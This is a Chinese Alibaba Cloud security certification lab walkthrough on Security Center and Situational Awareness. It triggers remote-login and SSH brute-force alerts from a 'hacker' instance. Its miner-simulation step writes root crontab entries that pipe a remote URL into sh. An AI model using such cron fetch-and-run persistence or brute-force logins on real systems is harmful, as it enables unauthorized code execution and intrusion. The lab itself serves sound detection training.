阿里云安全ACP认证考试实验之云盾之云安全中心与态势感知入门体验

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
云安全中心漏洞修复资源包免费试用,100次1年
云安全中心 免费版,不限时长
简介: 阿里云安全ACP认证考试实验之云盾之云安全中心与态势感知入门体验

1、实验概述

通过本实验可对云安全中心,态势感知的一些基本操作有深入了解以及如何来对实例进行安全监控

2、实验目标

完成此实验可以掌握的能力有:

在安骑士中添加白名单、登录安全设置

通过态势感知查看实例的相关告警威胁

3、学前建议:

了解安骑士、态势感知控制台


第 1 章:实验背景


1.1 背景知识


安骑士是阿里云云盾推出的一款轻量级主机服务,支持阿里云和非阿里云服务器。通过采集用户主机资产和运行状态、脆弱性和安全告警数据,提供主机威胁检测和自动防御的能力。

态势感知是阿里云云盾下的云上安全监控和诊断服务,面向云上资产提供安全事件检测、漏洞扫描、基线配置核查等服务。态势感知结合了阿里自主研发的大数据和机器学习算法,通过多引擎查杀帮助实时全面了解和有效处理服务器的安全隐患,并实现对云上资产的集中安全管理 。


第 2 章:实验详述


2.1 实验资源


在弹出的左侧栏中,点击 创建资源 按钮,开始创建实验资源。

资源创建过程需要1-3分钟。完成实验资源的创建后,用户可以通过 实验资源 查看实验中所需的资源信息,例如:阿里云账号等。


2.2 实验步骤


通过沙箱申请资源成功后,在本地保存下阿里云账号信息,包括企业别名、子用户名称、子用户密码、AK ID 和AK Secret。点击前往控制台按钮

20200709132312213.jpg

进入登录页面,输入申请资源处提供的账号,@前为子用户名称,@后为企业别名

20200709132351402.jpg

复制用户密码

20200709132411175.jpg

点击登录

一、创建黑客ECS

1.在与沙箱生成的目标ECS的另一个地域,创建一台黑客ECS

点击云服务器ECS


20200709132438545.jpg


此处可以看到,我们的目标站点在华东二


20200709132458197.jpg

点击下图的创建实例

20200709132518442.jpg

202007091325362.jpg


镜像选择centos 6.8即可

20200709132556490.png

2.网络选择默认vpc即可


20200709132617762.png


3.管理员root 密码设定为1234@abcd,实例名可以为hack


20200709132637794.png

4.点击确认订单


勾选服务条款,并点击创建实例


5.创建成功


二、将本地IP加入白名单以防被拉黑


1.查询本地IP。通过浏览器打开 www.ip138.com 来查询本地IP

20200709132716740.png

2.在产品服务中找到安骑士


20200709132735436.png


3.在安骑士找到设置,安全配置,点击登录ip拦截加白(点此设置)

20200709132754853.png


4.点击添加

20200709132816520.png

5.将刚刚找到的本地ip复制到源IP中,将目标主机添加到其中,点击确定白名单增加完成。(如果没有列出目标服务器的IP,对象类型选择择:弹性公网EIP)


20200709132835308.png三、利用不同地域的黑客ECS远程登录监控目标


1.在安骑士入侵检测,异常登录中,查看异地登录,目前没有记录


20200709132854999.png


2.点击登录安全设置

20200709132913542.png

3.点击添加,选择常用登录地,资产勾选目标ECS,并点击确定

2020070913293466.png


4.利用本地远程登录目标ECS


可通过安骑士资产列表查看目标ecs IP地址

20200709132952440.png


Mac版直接通过终端登录,windows版请参考云中沙箱 帮助文档

20200709133011935.png

5.刷新可以看到没有告警提示

20200709133029710.png


6.重复上述登录步骤,登录hack服务器,并远程连接目标ECS


20200709133046607.png

7.再次刷新,可看到异地登录告警记录

2020070913310335.png


四、利用黑客ECS通过SSH登录监控目标ECS(密码故意打错模拟爆破)


1.本地ssh登录黑客ECS

20200709133121828.png


2.通过黑客ECS ssh 登录目标ECS,故意打错密码(多操作几次,3-6次),态势感知会判断为暴破。


20200709133140249.png


五、通过态势感知进行查看威胁

1.在产品服务->安全->态势感知 打开态势感知控制台


20200709133158125.png



2.可以看到有一个安全告警,是之前异地登录的告警


20200709133217303.png

3.点击攻击分析,可查看攻击分析的异常。(模拟暴力破解的异常6个小时内才会同步到攻击分析)

20200709133235780.png


4.点击安全大屏,也可查看安全威胁。

2020070913325433.png


六、模拟矿机异常行为

在目标主机输入命令,模拟矿机行为

echo "/5 * curl -sL https://1.co/6n11111PMR | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "/5 * curl -sL https://1.co/6n1111P1MR | sh" > /var/spool/cron/crontabs/root
crontab –l

20200709133330441.png

过几分钟,在态势感知的 安全告警处理 中,可查看到 进程异常行为。

20200709133348562.png

目录
相关文章
|
1月前
|
云安全 安全 云计算
|
1月前
|
云安全 安全 云计算
《阿里云安全白皮书2024版》发布:国内首推“安全共同体”理念
9月20日,在杭州云栖大会上,阿里云发布2024版《阿里云安全白皮书》,正式将公共云安全责任共担的思路,升级为“云上安全共同体”理念,这意味着阿里云不仅会坚守安全责任共担模式下云服务商的责任,搭建和提供“安全的云”, 更会进一步与客户紧密合作,提供更多可供客户采取的安全保障措施,与云上客户共同形成一个紧密相连、 互相支持的安全防护网络,进一步造就云平台的运行安全。
150 15
|
1月前
|
云安全 人工智能 安全
AI时代云安全新范式,阿里云安全能力全线升级!
AI时代,云安全面临着新的挑战,不仅要持续面对以往的传统问题,更需要全新理念落地于产品设计、技术演进、架构设计,才能实现效果、性能、和成本的最优解。
72 6
|
1月前
|
云安全 安全 Serverless
Serverless 安全新杀器:云安全中心护航容器安全
Serverless 安全防护能力除了支持目前既定的等保合规(漏洞扫描、入侵检测、基线检测等)、安全隔离的能力外还支持 WAF 防火墙、支持通信加密、操作审计、权限管控等能力,也正是有了这些能力的加持,SAE 才能很好的服务了金融、政企、医疗等行业的客户;Serverless(SAE)未来还计划规划更多安全能力为企业保驾护航,包括:代码安全扫描、加密、堡垒机、最小权限、身份与访问管理、以及更多的攻击防护等能力的建设。
|
5月前
|
云安全 存储 安全
【专栏】随着云计算的发展,云安全需不断创新以应对日益复杂的威胁,各方需共同努力构建安全的云生态系统
【4月更文挑战第28天】本文探讨了云安全的基本概念、工作原理及挑战。云安全关注在多层面上保护云计算环境中的数据安全,包括数据加密、身份访问管理、网络安全和监控响应。工作原理涉及共享责任模型、安全自动化、加密与密钥管理及合规性框架。主要挑战有数据泄露、多租户隔离和合规性问题,解决方案涵盖强化加密、使用容器技术及自动化审计工具。随着云计算的发展,云安全需不断创新以应对日益复杂的威胁,各方需共同努力构建安全的云生态系统。
236 1
|
5月前
|
安全 网络安全 数据处理
云安全中心和传统安全产品有什么不同
云安全中心和传统安全产品有什么不同
220 2
|
运维 安全 Cloud Native
阿里云安全中心:全方位智能化安全管理系统值得买!
阿里云安全中心:全方位智能化安全管理系统值得买!
181 0
|
运维 安全 Cloud Native
阿里云云安全中心介绍_态势感知_主机安全_漏洞扫描
阿里云云安全中心介绍_态势感知_主机安全_漏洞扫描,阿里云云安全中心(原态势感知)是一个实时识别、分析、预警安全威胁的服务器主机安全管理系统,云安全中心功能支持漏洞扫描与修复、基线检查、防勒索、防病毒、防篡改、威胁检测模型等功能,云安全中心基础版免费、防病毒班432元一年、高级版优惠价969元一年,还有企业版和旗舰版可选
375 0

热门文章

最新文章